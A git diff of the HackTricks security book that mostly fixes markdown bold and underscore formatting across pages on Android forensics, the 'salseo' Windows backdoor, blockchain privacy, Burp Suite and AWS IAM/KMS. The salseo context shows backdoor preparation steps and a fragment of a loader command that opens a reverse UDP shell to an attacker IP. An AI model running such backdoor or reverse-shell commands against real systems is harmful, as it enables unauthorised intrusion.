+* I'm very proud of this **book** and my **PEASS** (I'm talking about these peass: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite))
 * And I really enjoy researching, playing CTFs, pentesting and everything related to **hacking**.
 
 ### Support HackTricks
 
 Thank you for be **reading this**!
 
-Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? [**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? [**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
diff --git a/android-forensics.md b/android-forensics.md
index 48a922d2..eaae8d27 100644
--- a/android-forensics.md
+++ b/android-forensics.md
@@ -5,7 +5,7 @@
 To start extracting data from an Android device it has to be unlocked. If it's locked you can:
 
 * Check if the device has debugging via USB activated.
-* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
+* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf)
 * Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
 
 ## Data Adquisition
@@ -14,7 +14,7 @@ Create an [android backup using adb](mobile-apps-pentesting/android-app-pentesti
 
 ### If root access or physical connection to JTAG interface
 
-* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0 _and corresponds to the whole flash memory).
+* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
 * `df /data` (Discover the block size of the system).
 * dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
 
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index 6bad142b..af053baa 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -12,7 +12,7 @@ Compile those projects for the architecture of the windows box where your are go
 
 You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
 
-**(**If you can't find this options press in **"Project Tab" **and then in **"\<Project Name> Properties"**)
+**(**If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
 
 ![](../.gitbook/assets/image.png)
 
@@ -22,7 +22,7 @@ Then, build both projects (Build -> Build Solution) (Inside the logs will appear
 
 ## Prepare the Backdoor
 
-First of all, you will need to encode the **EvilSalsa.dll. **To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
+First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**
 
 ### **Python**
 
@@ -62,7 +62,7 @@ SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <A
 
 ### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
 
-**This time you need a special tool in the client to receive the reverse shell. Download: **[**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)****
+**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)****
 
 #### **Disable ICMP Replies:**
 
@@ -95,7 +95,7 @@ Open the SalseoLoader project using Visual Studio.
 
 ### Install DllExport for this project
 
-#### **Tools** --> **NuGet Package Manager **--> **Manage NuGet Packages for Solution...**
+#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
 
 ![](<../.gitbook/assets/image (3).png>)
 
@@ -103,27 +103,27 @@ Open the SalseoLoader project using Visual Studio.
 
 ![](<../.gitbook/assets/image (4).png>)
 
-In your project folder have appeared the files: **DllExport.bat** and **DllExport_Configure.bat**
+In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
 
 ### **U**ninstall DllExport
 
-Press **Uninstall **(yeah, its weird but trust me, it is necessary)
+Press **Uninstall** (yeah, its weird but trust me, it is necessary)
 
 ![](<../.gitbook/assets/image (5).png>)
 
-### **Exit Visual Studio and execute DllExport_configure**
+### **Exit Visual Studio and execute DllExport\_configure**
 
 Just **exit** Visual Studio
 
-Then, go to your **SalseoLoader folder **and **execute DllExport_Configure.bat**
+Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
 
-Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices **(inside **Namespace for DllExport**) and press **Apply**
+Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
 
 ![](<../.gitbook/assets/image (7).png>)
 
 ### **Open the project again with visual Studio**
 
-**\[DllExport] **should not be longer marked as error
+**\[DllExport]** should not be longer marked as error
 
 ![](<../.gitbook/assets/image (8).png>)
 
diff --git a/blockchain/blockchain-and-crypto-currencies.md b/blockchain/blockchain-and-crypto-currencies.md
index b4281992..b36e501e 100644
--- a/blockchain/blockchain-and-crypto-currencies.md
+++ b/blockchain/blockchain-and-crypto-currencies.md
@@ -5,8 +5,8 @@
 * **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary’s involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)).
   * Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them.
 * **dApps**: **Decentralised applications** are implemented on top of **smart** **contracts**. They usually have a front-end where the user can interact with the app, the **back-end** is public (so it can be audited) and is implemented as a **smart contract**. Sometimes the use of a database is needed, Ethereum blockchain allocates certain storage to each account.
-* **Tokens & coins**: A **coin** is a cryptocurrency that act as **digital** **money** and a **token** is something that **represents **some **value** but it's not a coin.
-  * **Utility Tokens**: These tokens allow the user to** access certain service later** (it's something that have some value in a specific environment).
+* **Tokens & coins**: A **coin** is a cryptocurrency that act as **digital** **money** and a **token** is something that **represents** some **value** but it's not a coin.
+  * **Utility Tokens**: These tokens allow the user to **access certain service later** (it's something that have some value in a specific environment).
   * **Security Tokens**: These represents the **ownership** or some asset.
 * **DeFi**: **Decentralized Finance**.
 * **DEX: Decentralized Exchange Platforms**.
@@ -14,7 +14,7 @@
 
 ## Consensus Mechanisms
 
-For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**. 
+For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**.&#x20;
 
 Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.
 
@@ -25,9 +25,9 @@ The **miners** will **select several transactions** and then start **computing t
 
 ### Proof Of Stake (PoS)
 
-PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens **on the blockchain to mount an attack.\
+PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\
 In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\
-Compared with PoW, this greatly **reduced the energy consumption **the miners are expending.
+Compared with PoW, this greatly **reduced the energy consumption** the miners are expending.
 
 ## Bitcoin
 
@@ -70,14 +70,14 @@ Each bitcoin transaction has several fields:
 
 * **Inputs**: The amount and address **from** where **bitcoins** are **being** transferred
 * **Outputs**: The address and amounts that each **transferred** to **each** **output**
-* **Fee: **The amount of **money** that is **payed** to the **miner** of the transaction
-* **Script_sig**: Script signature of the transaction
-* **Script_type**: Type of transaction
+* **Fee:** The amount of **money** that is **payed** to the **miner** of the transaction
+* **Script\_sig**: Script signature of the transaction
+* **Script\_type**: Type of transaction
 
 There are **2 main types** of transactions:
 
 * **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security.
-* **P2SH: "Pay To Script Hash": **The outputs of a transaction are just **scripts **(this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts** logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one.
+* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one.
 
 ### Lightning Network
 
@@ -86,7 +86,7 @@ This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per
 
 ![](<../.gitbook/assets/image (611).png>)
 
-Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making** any number **of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds.
+Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds.
 
 Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time.
 
@@ -98,7 +98,7 @@ Theoretically the inputs of one transaction can belong to different users, but i
 
 ### UTXO Change Address Detection
 
-**UTXO** means** Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**,** 2 different outputs **will appear: the **intended** one and a **random new change address** where the rest of the money will be saved.
+**UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved.
 
 Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**.
 
@@ -108,7 +108,7 @@ Some people gives data about theirs bitcoin addresses in different webs on Inter
 
 ### Transaction Graphs
 
-By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain. 
+By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain.&#x20;
 
 ### **Unnecessary input heuristic**
 
@@ -140,8 +140,8 @@ The correct behaviour by wallets is to not spend coins that have landed on an al
 ### Other Blockchain Analysis
 
 * **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**.
-* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that **"round number" **price**, so the other part must be the leftover.
-* **Wallet fingerprinting: **A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint.
+* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover.
+* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint.
 * **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**.
 
 ### Traffic analysis
@@ -160,14 +160,14 @@ For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it
 
 ### Obtaining Bitcoins Anonymously
 
-* **Cash trades: **Buy bitcoin using cash.
-* **Cash substitute: **Buy gift cards or similar and exchange them for bitcoin online.
-* **Mining: **Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled_mining) generally know the hasher's IP address.
-* **Stealing: **In theory another way of obtaining anonymous bitcoin is to steal them.
+* **Cash trades:** Buy bitcoin using cash.
+* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online.
+* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address.
+* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them.
 
 ### Mixers
 
-A user would** send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be** unable to link** the incoming and outgoing transactions.
+A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions.
 
 However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\
 Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later.
@@ -180,13 +180,13 @@ This offers a new level of privacy, however, **some** **transactions** where som
 Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
 
 [**https://coinjoin.io/en**](https://coinjoin.io/en)****\
-**Similar to coinjoin but better and for ethereum you have **[**Tornado Cash**](https://tornado.cash)** (the money is given from miners, so it jus appear in your waller).**
+**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).**
 
 ### PayJoin
 
-The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value. 
+The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value.&#x20;
 
-PayJoin (also called pay-to-end-point or P2EP) is a special type of CoinJoin between two parties where one party pays the other. The transaction then **doesn't have the distinctive multiple outputs **with the same value, and so is not obviously visible as an equal-output CoinJoin. Consider this transaction:
+PayJoin (also called pay-to-end-point or P2EP) is a special type of CoinJoin between two parties where one party pays the other. The transaction then **doesn't have the distinctive multiple outputs** with the same value, and so is not obviously visible as an equal-output CoinJoin. Consider this transaction:
 
 ```
 2 btc --> 3 btc
@@ -201,10 +201,10 @@ If PayJoin transactions became even moderately used then it would make the **com
 
 ### Wallet Synchronization
 
-Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet **(which is maximally private) and **client-side block filtering** (which is very good).
+Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good).
 
-* **Full node: **Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in. 
-* **Client-side block filtering: **Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an** element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance.
+* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in.&#x20;
+* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance.
 
 ### Tor
 
@@ -228,7 +228,7 @@ If change avoidance is not an option then **creating more than one change output
 
 ## Monero
 
-When Monero was developed, the gaping need for **complete anonymity **was what it sought to resolve, and to a large extent, it has filled that void.
+When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void.
 
 ## Ethereum
 
@@ -248,7 +248,7 @@ When Jordan sends the money, 1.00231 ETH will be deducted from Jordan's account.
 
 Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction. The difference between the max fee and the actual fee is refunded to Jordan, i.e. `refund = max fee - (base fee + priority fee)`. Jordan can set a maximum amount to pay for the transaction to execute and not worry about overpaying "beyond" the base fee when the transaction is executed.
 
-As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed. 
+As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed.&#x20;
 
 ### Transactions
 
@@ -272,10 +272,10 @@ Note that there isn't any field for the origin address, this is because this can
 
 ## References
 
-* [https://en.wikipedia.org/wiki/Proof_of_stake](https://en.wikipedia.org/wiki/Proof_of_stake)
+* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
 * [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
 * [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
 * [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
 * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
-* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse)
+* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
 
diff --git a/burp-suite.md b/burp-suite.md
index 9534468b..c9045fed 100644
--- a/burp-suite.md
+++ b/burp-suite.md
@@ -2,11 +2,11 @@
 
 ## Basic Payloads
 
-* **Simple List: **Just a list containing an entry in each line
-* **Runtime File: **A list read in runtime (not loaded in memory). For supporting big lists.
-* **Case Modification: **Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
-* **Numbers: **Generate numbers from X to Y using Z step or randomly.
-* **Brute Forcer: **Character set, min & max length.
+* **Simple List:** Just a list containing an entry in each line
+* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists.
+* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-.
+* **Numbers:** Generate numbers from X to Y using Z step or randomly.
+* **Brute Forcer:** Character set, min & max length.
 
 [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
 
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md
index 40717342..3af52568 100644
--- a/cloud-security/aws-security.md
+++ b/cloud-security/aws-security.md
@@ -6,35 +6,35 @@
 
 Services that fall under container services have the following characteristics:
 
-* The service itself runs on** separate infrastructure instances**, such as EC2.
-* **AWS **is responsible for **managing the operating system and the platform**.
+* The service itself runs on **separate infrastructure instances**, such as EC2.
+* **AWS** is responsible for **managing the operating system and the platform**.
 * A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
 * As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
 * Also, platform-level identity and access management where it exists.
-* **Examples **of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
+* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
 
 ### Abstract Services
 
-* These services are** removed, abstracted, from the platform or management layer which cloud applications are built on**.
+* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
 * The services are accessed via endpoints using AWS application programming interfaces, APIs.
-* The** underlying infrastructure, operating system, and platform is managed by AWS**.
+* The **underlying infrastructure, operating system, and platform is managed by AWS**.
 * The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
 * **Data is isolated via security mechanisms**.
-* Abstract services have a strong integration with IAM, and **examples **of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
+* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
 
 ## IAM - Identity and Access Management
 
-IAM is the service that will allow you to manage **Authentication**, **Authorization **and **Access Control** inside your AWS account.
+IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
 
-* **Authentication **- Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-* **Authorization **- Determines what an identity can access within a system once it's been authenticated to it.
+* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
+* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
 * **Access Control** - The method and process of how access is granted to a secure resource
 
 IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
 
 ### Users
 
-This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application **that may require permissions to **access **your **AWS **resources **programmatically**. Note that **usernames must be unique**.
+This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
 
 #### CLI
 
@@ -44,7 +44,7 @@ This could be a **real person** within your organization who requires access to
 Whenever you need to **change the Access Key** this is the process you should follow:\
 ****_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
 
-**MFA **is **supported **when using the AWS **CLI**.
+**MFA** is **supported** when using the AWS **CLI**.
 
 ### Groups
 
@@ -54,22 +54,22 @@ These are objects that **contain multiple users**. Permissions can be assigned t
 
 Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.
 
-An IAM role consists of** two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
+An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
 
-#### AWS Security Token Service (STS) 
+#### AWS Security Token Service (STS)&#x20;
 
-This is a web service that enables you to** request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
+This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
 
 ### Policies
 
 #### Policy Permissions
 
-Are used to assign permissions. There are 2 types: 
+Are used to assign permissions. There are 2 types:&#x20;
 
 * AWS managed policies (preconfigured by AWS)
 * Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing  your own..
 
-By **default access **is **denied**, access will be granted if an explicit role has been specified. \
+By **default access** is **denied**, access will be granted if an explicit role has been specified. \
 If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
 
 ```javascript
@@ -117,7 +117,7 @@ AWS Identity Federation connects via IAM roles.
 
 #### Cross Account Trusts and Roles
 
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user **(trusted) to **access his account **but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
+**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
 It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
 
 #### AWS Simple AD
@@ -143,14 +143,14 @@ The app uses the AssumeRoleWithWebIdentity to create temporary credentials. Howe
 
 ## KMS - Key Management Service
 
- AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to** create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are** protected by hardware security modules** (HSMs)
+&#x20;AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs)
 
-KMS uses** symmetric cryptography**. This is used to **encrypt information as rest **(for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\
+KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\
 KMS is a **region specific service**.
 
 **Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used.
 
-**Customer Master Keys **(CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
+**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
 
 A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
 
@@ -196,14 +196,14 @@ Key administrator by default:
 ### Rotation of CMKs
 
 * The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
-* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years **and this time it cannot be changed.
+* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
 * **Older keys are retained** to decrypt data that was encrypted prior to the rotation
 * In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-* If **CMK **is in state of **disabled **or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
+* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
 
 #### Manual rotation
 
-* A** new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update **any **application **to **reference **the new CMK-ID.
+* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
 * To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
 * You need to **keep old keys to decrypt old files** encrypted with it.
 
@@ -227,7 +227,7 @@ You cannot synchronize or move/copy keys across regions; you can only define rul
 
